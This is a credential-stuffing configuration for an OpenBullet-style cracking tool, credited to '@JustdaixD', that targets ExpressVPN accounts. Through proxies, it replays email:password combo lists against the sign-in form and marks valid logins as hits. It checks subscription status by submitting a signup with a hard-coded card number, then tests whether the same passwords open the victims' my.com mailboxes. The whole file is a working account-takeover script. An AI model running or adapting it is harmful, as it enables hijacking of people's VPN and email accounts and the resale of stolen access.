[SETTINGS]
{
  "Name": "ExpressVPN {Web Api}",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-08-07T20:53:52.5890176+05:30",
  "AdditionalInfo": "Config made by @JustdaixD",
  "RequiredPlugins": [],
  "Author": "Just Dai xD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ExpressVPN {Web Api}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.expressvpn.com/sign-in" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#authenticity_token PARSE "<SOURCE>" REGEX "(?<=<input\\stype=\"hidden\"\\sname=\"authenticity_token\"\\svalue=\")(.*?)(?=\"\\s\\/>)" "[0]" EncodeOutput=TRUE -> VAR "authenticity_token" 

#PASSWD FUNCTION URLEncode "<PASS>" -> VAR "PASSWD" 

#USSER FUNCTION URLEncode "<USER>" -> VAR "USSER" 

REQUEST POST "https://www.expressvpn.com/sessions" 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<authenticity_token>&location_fragment=&redirect_path=&email=<USSER>&password=<PASSWD>&commit=Sign+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "origin: https://www.expressvpn.com" 
  HEADER "referer: https://www.expressvpn.com/sign-in" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Microsoft Edge\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password." 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" EqualTo "https://www.expressvpn.com/verify" 

REQUEST GET "https://www.expressvpn.com/order" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#csrf PARSE "<SOURCE>" REGEX "(?<=<meta\\sname=\"csrf-token\"\\scontent=\")(.*?)(?=\"\\s\\/>)" "[0]" EncodeOutput=TRUE -> VAR "csrf" 

REQUEST POST "https://www.expressvpn.com/signup" AutoRedirect=FALSE ReadResponseSource=FALSE 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<csrf>&signup%5Bpackage_id%5D=1&signup%5Bpayment_method%5D=1&signup%5Bemail%5D=<USSER>&signup%5Bfirst_name%5D=alis&signup%5Blast_name%5D=syn&signup%5Bcc_number_is_pasted%5D=1&signup%5Bcc_no%5D=5189412158628908&signup%5Bexpiry_month%5D=10&signup%5Bexpiry_year%5D=2031&signup%5Bccv%5D=001&signup%5Bzip%5D=10080" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.expressvpn.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Microsoft Edge\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://www.expressvpn.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://www.expressvpn.com/order" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

FUNCTION Delay "3000" -> VAR "wait_bitch" 

REQUEST GET "https://www.expressvpn.com/order" 
  
  HEADER "Host: www.expressvpn.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Microsoft Edge\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: <HEADERS(Location)>" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Email already has active account" 
  KEYCHAIN Custom "EXPIRED" AND 
    KEY "we were unable to charge your card" 
    KEY "<SOURCE>" DoesNotContain "Email already has active account" 

REQUEST GET "https://aj-https.my.com/cgi-bin/auth?model=&simple=1&Login=<USER>&Password=<PASS>" 
  
  HEADER "User-Agent: MyCom/12436 CFNetwork/758.2.8 Darwin/15.0.0" 

IF "<SOURCE>" Contains "Ok=1"

FUNCTION Constant "True" -> CAP "PC Login" 

FUNCTION Constant "True" -> CAP "Mobile Login" 

FUNCTION Constant "True" -> CAP "Mail Access" 

ELSE
IF "<SOURCE>" Contains "Ok=0"

FUNCTION Constant "False" -> CAP "PC Login" 

FUNCTION Constant "True" -> CAP "Mobile Login" 

FUNCTION Constant "False" -> CAP "Mail Access" 

ENDIF

FUNCTION Constant "Active Subscription" -> CAP "Status" 

FUNCTION Constant "@JustdaixD" -> CAP "Config made by" 

